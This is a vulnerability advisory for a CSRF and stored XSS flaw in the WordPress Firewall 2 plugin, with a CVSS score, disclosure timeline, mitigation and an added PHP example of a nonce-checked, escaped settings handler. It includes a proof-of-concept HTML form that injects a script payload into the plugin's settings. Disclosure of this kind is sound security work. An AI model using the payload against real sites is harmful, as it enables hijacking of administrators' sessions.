CSRF/stored XSS in WordPress Firewall 2 allows unauthenticated attackers to do almost anything an admin can


Last revised:

The plugin does not escape HTML in its stored settings and its settings form has no CSRF protection, so an attacker can place arbitrary HTML content on the settings page.

Current state: Identified

CVSS Summary

CVSS base scores for this vulnerability
Score: 5.8 (Medium)
Access Vector: Network
Access Complexity: Medium
Authentication: None
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Visit the following page, click on the submit button, then visit the plugin’s options page:

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php">
  <input type="text" name="email_address" value="&quot;>&lt;script>alert(1)&lt;/script>">
  <input type="text" name="set_email" value="Set Email">
  <input type="submit">
</form>

In a real attack, forms can be submitted automatically and spear-phishing attacks can be convincing.

Advisory timeline

  • 2016-12-23: Discovered
  • 2017-03-16: Reported to vendor by email
  • 2017-04-04: Vendor could not be contacted

Mitigation/further actions

Disable the plugin until a new version is released that fixes this bug.
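For reference, this is what a fixed settings handler needs to do. The snippet below is an added illustration written for this advisory, not code from the WordPress Firewall 2 plugin; the function names (`wpf2_save_email`, `wpf2_render_settings_page`), the option key `wpf2_email_address` and the nonce action/field names are assumptions. It closes both weaknesses at once: the POST handler refuses requests that lack a valid WordPress nonce (so a cross-site form cannot change the setting) and sanitizes the value before storing it, and the settings page escapes the stored value on output (so nothing that reaches the database can become markup).

```php
<?php
// Added example, not the plugin's own code. Names such as wpf2_save_email(),
// the option key 'wpf2_email_address' and the nonce action 'wpf2_set_email'
// are assumptions chosen for illustration.

// 1. Handle the POST: require the capability and a nonce, then sanitize
//    the value before it is stored.
function wpf2_save_email() {
    if ( ! isset( $_POST['set_email'] ) ) {
        return;
    }
    // Only users who may manage options can change the setting.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    // Dies with "The link you followed has expired" unless a nonce tied to
    // this action and the current user was posted. A form hosted on
    // another site cannot supply one, which blocks the CSRF step.
    check_admin_referer( 'wpf2_set_email', 'wpf2_nonce' );

    $email = sanitize_email( wp_unslash( $_POST['email_address'] ?? '' ) );
    if ( ! is_email( $email ) ) {
        add_settings_error( 'wpf2', 'bad_email', 'Please enter a valid email address.' );
        return;
    }
    update_option( 'wpf2_email_address', $email );
}
add_action( 'admin_init', 'wpf2_save_email' );

// 2. Render the settings form: emit the nonce field and escape the stored
//    value for an attribute context, so a stored "><script>...</script>
//    payload is shown as text instead of being executed.
function wpf2_render_settings_page() {
    $email = get_option( 'wpf2_email_address', '' );
    ?>
    <form method="post">
        <?php wp_nonce_field( 'wpf2_set_email', 'wpf2_nonce' ); ?>
        <label for="email_address">Notification email</label>
        <input type="email" id="email_address" name="email_address"
               value="<?php echo esc_attr( $email ); ?>">
        <input type="submit" name="set_email" class="button" value="Set Email">
    </form>
    <?php
}
```

The two halves are independent defences: the nonce check alone would stop the cross-site submission but still leave any value an admin typed unescaped, and `esc_attr()` alone would neutralise the markup but still let a cross-site form silently change the notification address. A fixed release should carry both.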